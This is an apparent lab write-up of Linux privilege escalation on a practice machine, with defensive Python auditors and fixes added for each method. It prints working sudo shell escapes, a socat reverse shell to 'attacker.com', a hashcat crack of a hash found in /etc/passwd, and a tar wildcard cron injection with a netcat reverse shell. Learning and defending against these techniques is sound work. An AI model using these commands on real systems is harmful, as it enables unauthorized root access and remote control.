Exploitation
This machine does not need enumeration: the author already gives us a set of credentials, and the box exists to let us practise our privilege escalation skills.
We log in with the given credentials.
Privilege Escalation
We can then type sudo -l.
It lists a long set of binaries we are allowed to run as root, and many of them can be abused to escalate.
Method 1 (User Rights)
We can take the commands from the cheat sheet website. Most of them are trivial, so we will not cover every one.
/bin/ash
/bin/ed
/usr/bin/env
/usr/bin/expect
    sudo expect -c 'spawn /bin/sh; interact'
/usr/bin/find
    sudo find . -exec /bin/sh \; -quit
/usr/bin/more
    TERM= sudo -E more /etc/profile
    !/bin/sh
/usr/bin/scp
    TF=$(mktemp)
    echo 'sh 0<&2 1>&2' > $TF
    chmod +x "$TF"
    sudo scp -S $TF x y:
/usr/bin/socat
On our machine:
    socat file:`tty`,raw,echo=0 tcp-listen:12345
On the target machine:
    sudo sh -c 'cp $(which socat) .; chmod +s ./socat'
    RHOST=attacker.com
    RPORT=12345
    ./socat tcp-connect:$RHOST:$RPORT exec:/bin/sh,pty,stderr,setsid,sigint,sane
/usr/bin/ssh
    sudo ssh -o ProxyCommand=';sh 0<&2 1>&2' x
/usr/bin/pico
    sudo pico
    ^R^X
    reset; sh 1>&0 2>&0
/usr/bin/rvim
    sudo rvim -c ':py import os; os.execl("/bin/sh", "sh", "-c", "reset; exec sh")'
/usr/bin/tclsh
    sudo tclsh
    exec /bin/sh <@stdin >@stdout 2>@stderr
/usr/bin/git
    sudo git -p help config
    !/bin/sh
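From the defender's side, the useful check is the same one the attacker runs: read sudo -l and flag every entry that names a binary with a known shell escape. The following Python is an added example written for this writeup, not code from the original post or from the cheat sheet; the sudo -l text is constructed, and the risky-binary set is exactly the list of paths given above.

```python
"""Audit ``sudo -l`` output for binaries that can be abused to spawn a shell.

Added example for this writeup (not part of the original post). The sample
``sudo -l`` output below is constructed; the risky-binary set is the list of
paths named on this page.
"""
import re

# Binaries named on this page as having a known sudo -> shell escape.
SHELL_ESCAPE_BINARIES = {
    "/bin/ash", "/bin/ed", "/usr/bin/env", "/usr/bin/expect",
    "/usr/bin/find", "/usr/bin/more", "/usr/bin/scp", "/usr/bin/socat",
    "/usr/bin/ssh", "/usr/bin/pico", "/usr/bin/rvim", "/usr/bin/tclsh",
    "/usr/bin/git",
}

# Constructed sample: what a low-privileged user might see from ``sudo -l``.
SAMPLE_SUDO_L = """\
Matching Defaults entries for tim on ubuntu:
    env_reset, mail_badpass

User tim may run the following commands on ubuntu:
    (ALL) NOPASSWD: /usr/bin/find, /usr/bin/expect
    (root) /usr/bin/more
    (ALL : ALL) ALL
    (www-data) NOPASSWD: /usr/bin/systemctl status nginx
"""

# "(runas) TAG: cmd1, cmd2" with the TAG part (NOPASSWD etc.) optional.
RULE_RE = re.compile(r"^\s*\(([^)]*)\)\s*(?:([A-Z_,!]+):)?\s*(.+)$")


def parse_sudo_rules(text):
    """Return (runas, tags, [commands]) tuples from the 'may run' section."""
    rules = []
    in_rules = False
    for line in text.splitlines():
        if "may run the following commands" in line:
            in_rules = True
            continue
        if not in_rules or not line.strip():
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        runas, tags, cmds = m.group(1), m.group(2) or "", m.group(3)
        commands = [c.strip() for c in cmds.split(",") if c.strip()]
        rules.append((runas.strip(), tags, commands))
    return rules


def audit_sudo_rules(text):
    """Flag rules that let the user reach a root shell via a known escape.

    Each finding is (command_or_binary, runas, reason).
    """
    findings = []
    for runas, tags, commands in parse_sudo_rules(text):
        for cmd in commands:
            binary = cmd.split()[0]
            if cmd == "ALL":
                findings.append((cmd, runas, "unrestricted sudo"))
            elif binary in SHELL_ESCAPE_BINARIES:
                why = "known shell escape"
                if "NOPASSWD" in tags:
                    why += ", no password required"
                findings.append((binary, runas, why))
    return findings


if __name__ == "__main__":
    for binary, runas, why in audit_sudo_rules(SAMPLE_SUDO_L):
        print(f"{binary:<28} runas={runas:<10} {why}")
```

In the sample, find, expect and more are flagged and the blanket (ALL : ALL) ALL line is reported separately, while the narrowly scoped systemctl status entry passes. The fix on the sudoers side is to remove the escape-capable binaries entirely; restricting their arguments does not help for editors, pagers and find, which escape through their own features.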
Method 2 (Hashed Passwords)
When we cat /etc/passwd, we can see every user on the system, and one user has a password hash stored directly in the file instead of in /etc/shadow.
Put it into hashcat (mode 1500 is the classic 13-character DES crypt format) and we can crack the hash:
    hashcat -m 1500 AzER3pBZh6WZE /usr/share/wordlists/rockyou.txt
We get the password, su to the user insecurity, and from there we can get root.
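A hash sitting in world-readable /etc/passwd is the kind of thing an auditor should catch before an attacker does. This Python check is an added example for this writeup, not code from the original post; the passwd lines are constructed (the insecurity entry reuses the hash shown on the page, the sysadm and guest entries are invented to show the other two checks), and the hashcat mode numbers are from hashcat's documented mode list.

```python
"""Check /etc/passwd entries for password hashes stored outside /etc/shadow.

Added example for this writeup, not part of the original post. The sample
passwd lines are constructed; the 'insecurity' entry mirrors the page's
finding (a 13-character DES crypt hash, hashcat mode 1500).
"""
import re

# Constructed sample of /etc/passwd. 'sysadm' and 'guest' are invented to
# exercise the UID-0 and empty-password checks.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
insecurity:AzER3pBZh6WZE:1001:1001::/home/insecurity:/bin/bash
tim:x:1000:1000:tim:/home/tim:/bin/bash
sysadm:x:0:0::/home/sysadm:/bin/bash
guest::1002:1002::/home/guest:/bin/sh
"""

# Recognisable crypt(3) hash formats and the matching hashcat mode
# (None where hashcat has no mode for the format).
HASH_FORMATS = [
    (re.compile(r"^\$1\$"), "md5crypt", 500),
    (re.compile(r"^\$5\$"), "sha256crypt", 7400),
    (re.compile(r"^\$6\$"), "sha512crypt", 1800),
    (re.compile(r"^\$y\$"), "yescrypt", None),
    (re.compile(r"^[./0-9A-Za-z]{13}$"), "descrypt", 1500),
]


def classify_password_field(field):
    """Label a passwd password field: shadowed, empty, locked or hash:<fmt>."""
    if field == "x":
        return "shadowed"
    if field == "":
        return "empty"
    if field.startswith(("*", "!")):
        return "locked"
    for pattern, name, _mode in HASH_FORMATS:
        if pattern.match(field):
            return f"hash:{name}"
    return "hash:unknown"


def hashcat_mode(field):
    """Return the hashcat -m value for a recognised hash, else None."""
    for pattern, _name, mode in HASH_FORMATS:
        if pattern.match(field):
            return mode
    return None


def audit_passwd(text):
    """Return (user, problem) findings for hashes, empty passwords, extra UID 0."""
    findings = []
    uid0 = []
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            findings.append((fields[0], "malformed entry"))
            continue
        user, pw, uid = fields[0], fields[1], fields[2]
        kind = classify_password_field(pw)
        if kind == "empty":
            findings.append((user, "empty password field"))
        elif kind.startswith("hash:"):
            findings.append((user, f"password hash in /etc/passwd ({kind[5:]})"))
        if uid == "0":
            uid0.append(user)
    for user in uid0:
        if user != "root":
            findings.append((user, "UID 0 account other than root"))
    return findings


if __name__ == "__main__":
    for user, problem in audit_passwd(SAMPLE_PASSWD):
        print(f"{user:<12} {problem}")
```

The remediation for the hash finding is simply to move the hash into /etc/shadow (pwconv does this) and rotate the password, since anything in /etc/passwd must be assumed cracked; descrypt in particular truncates passwords to 8 characters, which is why rockyou-style wordlist attacks against mode 1500 finish quickly.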
Method 3 (Cron Jobs)
If we type cat /etc/crontab, we can see a backup job running every minute.
If we ls -la /etc/backups, we can see the tar archive it produces. The article linked on this website gives a very detailed explanation of the wildcard trick used here.
On our machine (listening on port 9999 for the callback):
On the target machine:
    echo "mkfifo /tmp/lhennp; nc 192.168.1.102 9999 0</tmp/lhennp | /bin/sh >/tmp/lhennp 2>&1; rm /tmp/lhennp" > shell.sh
    echo "" > "--checkpoint-action=exec=sh shell.sh"
    echo "" > --checkpoint=1
    tar cf archive.tar *
After waiting a minute for the cron job to run tar, we get a shell.
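The trick works because the shell expands * into file names and tar cannot tell a file called --checkpoint=1 from a real option. A defender can catch the pattern from two directions: a cron line that runs tar on a bare wildcard, and a backup directory that already contains option-looking file names. The Python below is an added example for this writeup, not code from the original post or the linked article; the crontab text is constructed, and the demo directory is built in a temporary folder with the same file names the page plants (as empty files, nothing is executed).

```python
"""Spot cron jobs that run tar with a shell wildcard, and option-like files.

Added example for this writeup, not part of the original post. The crontab
text is constructed; the demo backup directory is a temp folder containing
empty files named like the ones the page creates.
"""
import os
import re
import tempfile

# Constructed system crontab modelled on the page's "backup every minute".
SAMPLE_CRONTAB = """\
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
*  *    * * *   root    cd /etc/backups && tar cf archive.tar *
"""


def parse_system_crontab(text):
    """Yield (user, command) from /etc/crontab-style lines; skip VAR=value."""
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or "=" in line.split()[0]:
            continue
        parts = line.split(None, 6)  # 5 schedule fields, user, command
        if len(parts) < 7:
            continue
        yield parts[5], parts[6]


def find_unsafe_tar_globs(command):
    """Return (cwd, tar_segment) pairs where tar receives a bare wildcard.

    A glob is treated as safe when it follows '--' (end of options) or is
    anchored with './' or '/', because the expansion then cannot begin with '-'.
    """
    cwd = None
    hits = []
    for segment in re.split(r"&&|\|\||;|\|", command):
        tokens = segment.split()
        if not tokens:
            continue
        if tokens[0] == "cd" and len(tokens) > 1:
            cwd = tokens[1]
        if tokens[0] != "tar":
            continue
        args = tokens[1:]
        end_of_opts = args.index("--") if "--" in args else len(args)
        for tok in args[:end_of_opts]:
            if ("*" in tok or "?" in tok) and not tok.startswith(("./", "/")):
                hits.append((cwd, segment.strip()))
                break
    return hits


def option_like_files(directory):
    """File names in directory that tar would parse as options after '*'."""
    try:
        names = os.listdir(directory)
    except OSError:
        return []
    return sorted(n for n in names if n.startswith("-"))


def audit_crontab(text, resolve_dir=lambda d: d):
    """Cross-check each tar-with-glob job against its working directory.

    resolve_dir lets a test point '/etc/backups' at a scratch directory.
    """
    findings = []
    for user, command in parse_system_crontab(text):
        for cwd, seg in find_unsafe_tar_globs(command):
            planted = option_like_files(resolve_dir(cwd)) if cwd else []
            findings.append({"user": user, "cwd": cwd, "command": seg,
                             "option_like_files": planted})
    return findings


def build_demo_backup_dir():
    """Create a temp directory holding empty files named like the page's."""
    d = tempfile.mkdtemp(prefix="backups-demo-")
    for name in ("notes.txt", "--checkpoint=1",
                 "--checkpoint-action=exec=sh shell.sh"):
        with open(os.path.join(d, name), "w"):
            pass
    return d


if __name__ == "__main__":
    demo = build_demo_backup_dir()
    for f in audit_crontab(SAMPLE_CRONTAB,
                           resolve_dir=lambda p: demo if p == "/etc/backups" else p):
        print(f"{f['user']} runs: {f['command']}")
        print(f"  files that look like options in {f['cwd']}: {f['option_like_files']}")
```

Both fixes are one token long: write the job as tar cf archive.tar -- * or tar cf archive.tar ./* so that expanded names can never be taken as options, and make sure the directory tar reads from is not writable by the low-privileged users whose files it backs up.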